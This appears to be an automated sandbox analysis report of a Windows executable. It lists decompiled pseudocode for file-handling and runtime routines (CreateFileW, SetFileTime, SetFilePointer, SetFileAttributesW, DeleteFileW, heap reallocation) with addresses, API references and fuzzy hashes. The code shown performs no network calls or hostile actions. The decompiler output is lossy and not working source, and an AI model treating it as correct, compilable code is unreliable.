                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _free$ErrorLast_abort
                            • String ID:
                            • API String ID: 2991157371-0
                            • Opcode ID: bfbc9f2a1aeaccf12a674d095a4880db19b69bacb2805403e2297d9b0e1a0c3a
                            • Instruction ID: d3f3b6cc0eac25f5eaad92c18f5d437ef07a3e1b89bfb978ba7902c3085c0593
                            • Opcode Fuzzy Hash: bfbc9f2a1aeaccf12a674d095a4880db19b69bacb2805403e2297d9b0e1a0c3a
                            • Instruction Fuzzy Hash: E0319131D0420CAFDB10EBA8F941BADB7F5EF50360F258099E5059B2E1EB72AE41CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E9528, Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E009E9528(void* __ecx, short _a4, WCHAR* _a4104, signed char _a4108) {
				long _v0;
				signed char _t34;
				signed int _t36;
				void* _t37;
				signed char _t46;
				struct _SECURITY_ATTRIBUTES* _t47;
				long _t56;
				void* _t59;
				long _t63;

				E009FD940();
				_t46 = _a4108;
				_t34 = _t46 >> 0x00000001 & 0x00000001;
				_t59 = __ecx;
				if((_t46 & 0x00000010) != 0 ||  *((char*)(__ecx + 0x1d)) != 0) {
					_t63 = 1;
					__eflags = 1;
				} else {
					_t63 = 0;
				}
				 *(_t59 + 0x18) = _t46;
				_v0 = ((0 | _t34 == 0x00000000) - 0x00000001 & 0x80000000) + 0xc0000000;
				_t36 =  *(E009EB927(_t34, _a4104)) & 0x0000ffff;
				if(_t36 == 0x2e || _t36 == 0x20) {
					if((_t46 & 0x00000020) != 0) {
						goto L8;
					} else {
						 *(_t59 + 4) =  *(_t59 + 4) | 0xffffffff;
						_t47 = 0;
						_t56 = _v0;
					}
				} else {
					L8:
					_t56 = _v0;
					_t47 = 0;
					__eflags = 0;
					_t37 = CreateFileW(_a4104, _t56, _t63, 0, 2, 0, 0); // executed
					 *(_t59 + 4) = _t37;
				}
				if( *(_t59 + 4) == 0xffffffff && E009EB32C(_a4104,  &_a4, 0x800) != 0) {
					 *(_t59 + 4) = CreateFileW( &_a4, _t56, _t63, _t47, 2, _t47, _t47);
				}
				 *((char*)(_t59 + 0x12)) = 1;
				 *(_t59 + 0xc) = _t47;
				 *(_t59 + 0x10) = _t47;
				return E009EFAB1(_t59 + 0x1e, _a4104, 0x800) & 0xffffff00 |  *(_t59 + 4) != 0xffffffff;
			}












                            0x009e952d
                            0x009e9533
                            0x009e9540
                            0x009e9542
                            0x009e9548
                            0x009e9556
                            0x009e9556
                            0x009e9550
                            0x009e9550
                            0x009e9550
                            0x009e9560
                            0x009e9575
                            0x009e957e
                            0x009e9584
                            0x009e958e
                            0x00000000
                            0x009e9590
                            0x009e9590
                            0x009e9594
                            0x009e9596
                            0x009e9596
                            0x009e959c
                            0x009e959c
                            0x009e959c
                            0x009e95a0
                            0x009e95a0
                            0x009e95b0
                            0x009e95b6
                            0x009e95b6
                            0x009e95bd
                            0x009e95eb
                            0x009e95eb
                            0x009e95fd
                            0x009e9602
                            0x009e9605
                            0x009e961e

                            APIs
                            • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,009E9BF3,?,?,009E76AC), ref: 009E95B0
                            • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,009E9BF3,?,?,009E76AC), ref: 009E95E5
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: c30f439090a8866a222b442cacca8bfe6987abd06aabb58789b39b537710d2b7
                            • Instruction ID: 4620f1f63ef4432f93d3d15d44d6bd0002027ab7cb2c2683a27bd53bb885f7c2
                            • Opcode Fuzzy Hash: c30f439090a8866a222b442cacca8bfe6987abd06aabb58789b39b537710d2b7
                            • Instruction Fuzzy Hash: 6321F3B1004788AFE7328F55C845BA777ECEB49364F004A2DF9E5862D2C774EC499B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E9A7E, Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 84%
                            			E009E9A7E(void* __ecx, void* __esi, signed char _a4, signed int* _a8, signed int* _a12) {
				void* _v8;
				void* _v16;
				void* _v24;
				signed char _v25;
				int _t34;
				signed char _t49;
				signed int* _t51;
				signed char _t57;
				void* _t58;
				void* _t59;
				signed int* _t60;
				signed int* _t62;

				_t59 = __esi;
				_t58 = __ecx;
				if( *(__ecx + 0x18) != 0x100 && ( *(__ecx + 0x18) & 0x00000002) == 0) {
					FlushFileBuffers( *(__ecx + 4));
				}
				_t51 = _a4;
				_t49 = 1;
				if(_t51 == 0 || ( *_t51 | _t51[1]) == 0) {
					_t57 = 0;
				} else {
					_t57 = 1;
				}
				_push(_t59);
				_t60 = _a8;
				_v25 = _t57;
				if(_t60 == 0) {
					L9:
					_a4 = 0;
				} else {
					_a4 = _t49;
					if(( *_t60 | _t60[1]) == 0) {
						goto L9;
					}
				}
				_t62 = _a12;
				if(_t62 == 0 || ( *_t62 | _a4) == 0) {
					_t49 = 0;
				}
				if(_t57 != 0) {
					E009F082F(_t51, _t57,  &_v24);
				}
				if(_a4 != 0) {
					E009F082F(_t60, _t57,  &_v8);
				}
				if(_t49 != 0) {
					E009F082F(_t62, _t57,  &_v16);
				}
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				_t34 = SetFileTime( *(_t58 + 4),  ~(_a4 & 0x000000ff) &  &_v8,  ~(_t49 & 0x000000ff) &  &_v16,  ~(_v25 & 0x000000ff) &  &_v24); // executed
				return _t34;
			}















                            0x009e9a7e
                            0x009e9a84
                            0x009e9a8d
                            0x009e9a98
                            0x009e9a98
                            0x009e9a9e
                            0x009e9aa4
                            0x009e9aa7
                            0x009e9ab4
                            0x009e9ab0
                            0x009e9ab0
                            0x009e9ab0
                            0x009e9ab6
                            0x009e9ab7
                            0x009e9abb
                            0x009e9ac1
                            0x009e9ace
                            0x009e9ace
                            0x009e9ac3
                            0x009e9ac8
                            0x009e9acc
                            0x00000000
                            0x00000000
                            0x009e9acc
                            0x009e9ad3
                            0x009e9ad9
                            0x009e9ae3
                            0x009e9ae3
                            0x009e9ae7
                            0x009e9aee
                            0x009e9aee
                            0x009e9af8
                            0x009e9b01
                            0x009e9b01
                            0x009e9b09
                            0x009e9b12
                            0x009e9b12
                            0x009e9b22
                            0x009e9b30
                            0x009e9b40
                            0x009e9b48
                            0x009e9b54

                            APIs
                            • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,009E738C,?,?,?), ref: 009E9A98
                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 009E9B48
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: File$BuffersFlushTime
                            • String ID:
                            • API String ID: 1392018926-0
                            • Opcode ID: b3f232336483e62086ce5b2fbaa7156bb0d10a66c781cca776698d85d8438814
                            • Instruction ID: 8de0d3bd75640266a5ba30027759ad87e410104d6e6e4a79fd18426e21bba20b
                            • Opcode Fuzzy Hash: b3f232336483e62086ce5b2fbaa7156bb0d10a66c781cca776698d85d8438814
                            • Instruction Fuzzy Hash: D421D3312482C5AFC712DF66D891AABBBECAF95304F08492CB885C7142D729ED08C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A09990, Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMON
                            Download Yara Rule
                            C-Code - Quality: 90%
                            			E00A09990(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				intOrPtr* _t34;

				_t20 = 0xa407b8 + _a4 * 4;
				_t27 =  *0xa1d668; // 0xda86b1c8
				_t29 = _t28 | 0xffffffff;
				_t33 = _t27 ^  *_t20;
				asm("ror esi, cl");
				if(_t33 == _t29) {
					L14:
					return 0;
				}
				if(_t33 == 0) {
					_t34 = _a12;
					if(_t34 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t29 ^ _t27;
							goto L14;
						}
						_t33 = GetProcAddress(_t13, _a8);
						if(_t33 == 0) {
							_t27 =  *0xa1d668; // 0xda86b1c8
							goto L13;
						}
						 *_t20 = E009FDB10(_t33);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E00A09A2C( *_t34); // executed
						if(_t13 != 0) {
							break;
						}
						_t34 = _t34 + 4;
						if(_t34 != _a16) {
							continue;
						}
						_t27 =  *0xa1d668; // 0xda86b1c8
						goto L7;
					}
					_t27 =  *0xa1d668; // 0xda86b1c8
					goto L8;
				}
				L2:
				return _t33;
			}










                            0x00a0999b
                            0x00a099a4
                            0x00a099aa
                            0x00a099b4
                            0x00a099b6
                            0x00a099ba
                            0x00a09a25
                            0x00000000
                            0x00a09a25
                            0x00a099be
                            0x00a099c4
                            0x00a099ca
                            0x00a099e6
                            0x00a099e6
                            0x00a099e8
                            0x00a099ea
                            0x00a09a15
                            0x00a09a17
                            0x00a09a1f
                            0x00a09a23
                            0x00000000
                            0x00a09a23
                            0x00a099f6
                            0x00a099fa
                            0x00a09a0f
                            0x00000000
                            0x00a09a0f
                            0x00a09a03
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a099cc
                            0x00a099cc
                            0x00a099ce
                            0x00a099d6
                            0x00000000
                            0x00000000
                            0x00a099d8
                            0x00a099de
                            0x00000000
                            0x00000000
                            0x00a099e0
                            0x00000000
                            0x00a099e0
                            0x00a09a07
                            0x00000000
                            0x00a09a07
                            0x00a099c0
                            0x00000000

                            APIs
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00A099F0
                            • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A099FD
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AddressProc__crt_fast_encode_pointer
                            • String ID:
                            • API String ID: 2279764990-0
                            • Opcode ID: 755f5b1b34f50c557a51a538f72ac04d7d11be69df1efbc4ed2513566d3152f5
                            • Instruction ID: 7e7cdd01c926fb34a4e1125aea88336670c49fc6c9971c50cdb0adf431e271f5
                            • Opcode Fuzzy Hash: 755f5b1b34f50c557a51a538f72ac04d7d11be69df1efbc4ed2513566d3152f5
                            • Instruction Fuzzy Hash: 3C11E377B111299BDF21DF6CFC409AB73A5AB803A07164220FD58AB2D5D630EC02C7D0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E9B57, Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                            Download Yara Rule
                            C-Code - Quality: 89%
                            			E009E9B57() {
				long _v4;
				void* __ecx;
				void* __ebp;
				long _t12;
				signed int _t14;
				signed int _t21;
				signed int _t22;
				void* _t23;
				long _t32;
				void* _t34;

				_t34 = _t23;
				_t22 = _t21 | 0xffffffff;
				if( *(_t34 + 4) != _t22) {
					L3:
					_v4 = _v4 & 0x00000000;
					_t12 = SetFilePointer( *(_t34 + 4), 0,  &_v4, 1); // executed
					_t32 = _t12;
					if(_t32 != _t22 || GetLastError() == 0) {
						L7:
						asm("cdq");
						_t14 = 0 + _t32;
						asm("adc edx, 0x0");
						goto L8;
					} else {
						if( *((char*)(_t34 + 0x14)) == 0) {
							_t14 = _t22;
							L8:
							return _t14;
						}
						E009E6DE2(0xa200e0, 0xa200e0, _t34 + 0x1e);
						goto L7;
					}
				}
				if( *((char*)(_t34 + 0x14)) == 0) {
					return _t22;
				}
				E009E6DE2(0xa200e0, 0xa200e0, _t34 + 0x1e);
				goto L3;
			}













                            0x009e9b5b
                            0x009e9b5d
                            0x009e9b68
                            0x009e9b7b
                            0x009e9b7b
                            0x009e9b8d
                            0x009e9b93
                            0x009e9b97
                            0x009e9bb4
                            0x009e9bba
                            0x009e9bbf
                            0x009e9bc1
                            0x00000000
                            0x009e9ba3
                            0x009e9ba7
                            0x009e9bd0
                            0x009e9bc4
                            0x00000000
                            0x009e9bc4
                            0x009e9baf
                            0x00000000
                            0x009e9baf
                            0x009e9b97
                            0x009e9b6e
                            0x00000000
                            0x009e9bcc
                            0x009e9b76
                            0x00000000

                            APIs
                            • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 009E9B8D
                            • GetLastError.KERNEL32 ref: 009E9B99
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ErrorFileLastPointer
                            • String ID:
                            • API String ID: 2976181284-0
                            • Opcode ID: 2c9c5eebb1b96105c65b164f30e869ed0292d0299e6aaf67c997b584587149eb
                            • Instruction ID: 36ad39b038b0f090a78d72f984a6a6a12e3baa865bfec1e072a391ec1abbc2eb
                            • Opcode Fuzzy Hash: 2c9c5eebb1b96105c65b164f30e869ed0292d0299e6aaf67c997b584587149eb
                            • Instruction Fuzzy Hash: 3501B9717002406FE7359E2AEC44B6B77DDAB84354F18463DB182C76C0DA74DC48C711
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E9903, Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                            Download Yara Rule
                            C-Code - Quality: 94%
                            			E009E9903(intOrPtr* __ecx, long _a4, long _a8, long _a12) {
				long _t14;
				void* _t17;
				intOrPtr* _t19;
				long _t21;
				void* _t23;
				long _t25;
				long _t28;
				long _t31;

				_t19 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0xffffffff) {
					L13:
					return 1;
				}
				_t28 = _a4;
				_t25 = _a8;
				_t31 = _t25;
				if(_t31 > 0 || _t31 >= 0 && _t28 >= 0) {
					_t21 = _a12;
				} else {
					_t21 = _a12;
					if(_t21 != 0) {
						if(_t21 != 1) {
							_t17 = E009E96E1(_t23);
						} else {
							_t17 =  *((intOrPtr*)( *_t19 + 0x14))();
						}
						_t28 = _t28 + _t17;
						asm("adc edi, edx");
						_t21 = 0;
					}
				}
				_a12 = _t25;
				_t14 = SetFilePointer( *(_t19 + 4), _t28,  &_a12, _t21); // executed
				if(_t14 != 0xffffffff || GetLastError() == 0) {
					goto L13;
				} else {
					return 0;
				}
			}











                            0x009e9907
                            0x009e990d
                            0x009e9972
                            0x00000000
                            0x009e9972
                            0x009e9910
                            0x009e9914
                            0x009e9917
                            0x009e9919
                            0x009e9943
                            0x009e9921
                            0x009e9921
                            0x009e9926
                            0x009e992d
                            0x009e9936
                            0x009e992f
                            0x009e9931
                            0x009e9931
                            0x009e993b
                            0x009e993d
                            0x009e993f
                            0x009e993f
                            0x009e9926
                            0x009e9948
                            0x009e9957
                            0x009e9962
                            0x00000000
                            0x009e996e
                            0x00000000
                            0x009e996e

                            APIs
                            • SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 009E9957
                            • GetLastError.KERNEL32 ref: 009E9964
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ErrorFileLastPointer
                            • String ID:
                            • API String ID: 2976181284-0
                            • Opcode ID: 1a98581afaf1cb4ea6391ba09a26866a07fca00f05945cf8b3a1a169038736c7
                            • Instruction ID: e745151285d9ca255ae150f3165d8dd088c194d0da79521bd62376d125868592
                            • Opcode Fuzzy Hash: 1a98581afaf1cb4ea6391ba09a26866a07fca00f05945cf8b3a1a169038736c7
                            • Instruction Fuzzy Hash: A001D4322002819B8F1ACE678C84BBE776DAF85330705822DED26CB293DB70DC119760
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A07B78, Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 96%
                            			E00A07B78(void* __ecx, void* __edx, void* _a4, long _a8) {
				void* __esi;
				void* _t4;
				long _t7;
				void* _t9;
				void* _t13;
				void* _t14;
				long _t16;

				_t13 = __edx;
				_t10 = __ecx;
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 = _a8;
					__eflags = _t16;
					if(_t16 != 0) {
						__eflags = _t16 - 0xffffffe0;
						if(_t16 <= 0xffffffe0) {
							while(1) {
								_t4 = RtlReAllocateHeap( *0xa40874, 0, _t14, _t16); // executed
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = E00A07906();
								if(__eflags == 0) {
									goto L5;
								}
								_t7 = E00A06763(_t10, _t13, _t16, __eflags, _t16);
								_pop(_t10);
								__eflags = _t7;
								if(_t7 == 0) {
									goto L5;
								}
							}
							L7:
							return _t4;
						}
						L5:
						 *((intOrPtr*)(E00A07ECC())) = 0xc;
						L6:
						_t4 = 0;
						__eflags = 0;
						goto L7;
					}
					E00A07A50(_t14);
					goto L6;
				}
				_t9 = E00A07A8A(__ecx, _a8); // executed
				return _t9;
			}










                            0x00a07b78
                            0x00a07b78
                            0x00a07b7e
                            0x00a07b83
                            0x00a07b91
                            0x00a07b94
                            0x00a07b96
                            0x00a07ba1
                            0x00a07ba4
                            0x00a07bcb
                            0x00a07bd5
                            0x00a07bdb
                            0x00a07bdd
                            0x00000000
                            0x00000000
                            0x00a07bbc
                            0x00a07bbe
                            0x00000000
                            0x00000000
                            0x00a07bc1
                            0x00a07bc6
                            0x00a07bc7
                            0x00a07bc9
                            0x00000000
                            0x00000000
                            0x00a07bc9
                            0x00a07bb3
                            0x00000000
                            0x00a07bb3
                            0x00a07ba6
                            0x00a07bab
                            0x00a07bb1
                            0x00a07bb1
                            0x00a07bb1
                            0x00000000
                            0x00a07bb1
                            0x00a07b99
                            0x00000000
                            0x00a07b9e
                            0x00a07b88
                            0x00000000

                            APIs
                            • _free.LIBCMT ref: 00A07B99
                              • Part of subcall function 00A07A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A02FA6,?,0000015D,?,?,?,?,00A04482,000000FF,00000000,?,?), ref: 00A07ABC
                            • RtlReAllocateHeap.NTDLL(00000000,?,?,?,?,00A200E0,009ECB18,?,?,?,?,?,?), ref: 00A07BD5
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AllocateHeap$_free
                            • String ID:
                            • API String ID: 1482568997-0
                            • Opcode ID: a9e5b4e0da91da82d28cefc31bbc3fc89aabfc6eec31f9c82df7ca9cd1c1cf79
                            • Instruction ID: 1e9cdc92dbc8a4fcb4878958d163cd9fda59ce09a883caddfe9b51754fa8c2e4
                            • Opcode Fuzzy Hash: a9e5b4e0da91da82d28cefc31bbc3fc89aabfc6eec31f9c82df7ca9cd1c1cf79
                            • Instruction Fuzzy Hash: B4F06231E0911D6ADB227B65BD41F6F37689F837B0B154156FC1AA61D0DB70F80191A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009F0574, Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E009F0574(void* __ecx) {
				long _v8;
				long _v12;
				int _t8;
				void* _t14;
				signed int _t15;
				signed int _t17;

				_t8 = GetProcessAffinityMask(GetCurrentProcess(),  &_v8,  &_v12); // executed
				if(_t8 == 0) {
					return _t8 + 1;
				}
				_t14 = 0;
				_t17 = _v8;
				_t15 = 1;
				do {
					if((_t17 & _t15) != 0) {
						_t14 = _t14 + 1;
					}
					_t15 = _t15 + _t15;
				} while (_t15 != 0);
				if(_t14 >= 1) {
					return _t14;
				}
				return 1;
			}









                            0x009f0588
                            0x009f0590
                            0x00000000
                            0x009f0592
                            0x009f0597
                            0x009f059b
                            0x009f059e
                            0x009f05a0
                            0x009f05a2
                            0x009f05a4
                            0x009f05a4
                            0x009f05a5
                            0x009f05a5
                            0x009f05ac
                            0x00000000
                            0x009f05ae
                            0x009f05b3

                            APIs
                            • GetCurrentProcess.KERNEL32(?,?), ref: 009F0581
                            • GetProcessAffinityMask.KERNEL32(00000000), ref: 009F0588
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Process$AffinityCurrentMask
                            • String ID:
                            • API String ID: 1231390398-0
                            • Opcode ID: 4cf8466b746e0dc424ea7495c2317c73ac3ba88e0a8a770654fa5f80af0ce623
                            • Instruction ID: a2d0ba270980007c78c612e80fedfaf95d71a5233804f44b9420f1dc9b16f361
                            • Opcode Fuzzy Hash: 4cf8466b746e0dc424ea7495c2317c73ac3ba88e0a8a770654fa5f80af0ce623
                            • Instruction Fuzzy Hash: 68E09276E1020EAB9F1886A69C059FB739DEA88311B20917AFA03D3301F974ED054BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009EA12F, Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                            Download Yara Rule
                            C-Code - Quality: 82%
                            			E009EA12F(WCHAR* _a4, long _a8) {
				short _v4100;
				int _t12;
				signed int _t18;
				signed int _t19;

				E009FD940();
				_push(_t18);
				_t12 = SetFileAttributesW(_a4, _a8); // executed
				_t19 = _t18 & 0xffffff00 | _t12 != 0x00000000;
				if(_t19 == 0 && E009EB32C(_a4,  &_v4100, 0x800) != 0) {
					_t19 = _t19 & 0xffffff00 | SetFileAttributesW( &_v4100, _a8) != 0x00000000;
				}
				return _t19;
			}







                            0x009ea137
                            0x009ea13c
                            0x009ea143
                            0x009ea14b
                            0x009ea150
                            0x009ea17c
                            0x009ea17c
                            0x009ea185

                            APIs
                            • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,009E9F65,?,?,?,009E9DFE,?,00000001,00000000,?,?), ref: 009EA143
                            • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,009E9F65,?,?,?,009E9DFE,?,00000001,00000000,?,?), ref: 009EA174
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            • Opcode ID: 616a2668ebc9d1ee5c29b2dbc9eb3db37ae44ab7fe1b12984f4b37d75ee4fda1
                            • Instruction ID: 92e004d110118c5cfc14feaa06c3708cad0f8967570e65d90cd1816b1ff7ea6d
                            • Opcode Fuzzy Hash: 616a2668ebc9d1ee5c29b2dbc9eb3db37ae44ab7fe1b12984f4b37d75ee4fda1
                            • Instruction Fuzzy Hash: CBF0A03114118DABDF029FA1DC01BEA37ACAB09381F448051BC8C86160DB72DEEAEB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FCB57, Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ItemText_swprintf
                            • String ID:
                            • API String ID: 3011073432-0
                            • Opcode ID: b780d51eff6b2c0476e74d18f2bedb8339370c0a777eaa2ac7f6be9a5ea41666
                            • Instruction ID: 8a9ba2c08e7f2419e21a83557b9efd8ec50163c7fd1c8ff5e7e4811965c949ef
                            • Opcode Fuzzy Hash: b780d51eff6b2c0476e74d18f2bedb8339370c0a777eaa2ac7f6be9a5ea41666
                            • Instruction Fuzzy Hash: F8F0E57250834C2AEB12EBB0DC07FBD3B1D9B45782F0444A5BB05520A2E5756F628762
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E9E18, Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 82%
                            			E009E9E18(WCHAR* _a4) {
				short _v4100;
				int _t10;
				signed int _t16;
				signed int _t17;

				E009FD940();
				_push(_t16);
				_t10 = DeleteFileW(_a4); // executed
				_t17 = _t16 & 0xffffff00 | _t10 != 0x00000000;
				if(_t17 == 0 && E009EB32C(_a4,  &_v4100, 0x800) != 0) {
					_t17 = _t17 & 0xffffff00 | DeleteFileW( &_v4100) != 0x00000000;
				}
				return _t17;
			}







                            0x009e9e20
                            0x009e9e25
                            0x009e9e29
                            0x009e9e31
                            0x009e9e36
                            0x009e9e5f
                            0x009e9e5f
                            0x009e9e68

                            APIs
                            • DeleteFileW.KERNELBASE(?,?,?,009E9648,?,?,009E94A3), ref: 009E9E29
